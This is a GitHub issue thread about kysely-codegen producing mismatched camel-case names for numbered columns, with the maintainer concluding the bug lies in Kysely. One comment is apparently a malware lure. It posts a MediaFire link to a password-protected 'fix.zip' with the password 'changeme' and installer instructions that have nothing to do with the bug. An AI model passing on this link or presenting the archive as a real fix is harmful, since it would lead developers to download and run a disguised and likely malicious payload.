### ISSUE TITLE
Columns with numbers and camel-casing incorrectly generated

### ISSUE THREAD

**Issue by morleytatro** [RobinBlomberg/kysely-codegen#189]
I have a table with a few columns that look like `checklist_item_1`, `checklist_item_2`, etc. The generated types with camel-casing come out as `checklistItem1`, `checklistItem2` as expected, but queries only work when using `checklistItem_1`, etc. Not sure if this is a bug with Kysely itself (if so, happy to move it), the camel-casing plugin, or with the codegen.

## Upvote & Fund

- We're using [Polar.sh](https://polar.sh/RobinBlomberg) so you can upvote and help fund this issue.
- We receive the funding once the issue is completed & confirmed by you.
- Thank you in advance for helping prioritize & fund our backlog.

<a href="https://polar.sh/RobinBlomberg/kysely-codegen/issues/189">
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://polar.sh/api/github/RobinBlomberg/kysely-codegen/issues/189/pledge.svg?darkmode=1">
  <img alt="Fund with Polar" src="https://polar.sh/api/github/RobinBlomberg/kysely-codegen/issues/189/pledge.svg">
</picture>
</a>

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobinBlomberg** [comment]
Hello! I tried fixing this, but I've determined that this is a bug in Kysely. If I generate the key as `checklistItem_1` instead, Kysely will still return `checklistItem1`, so I don't think the codegen can solve this sufficiently. Hope it can be solved!
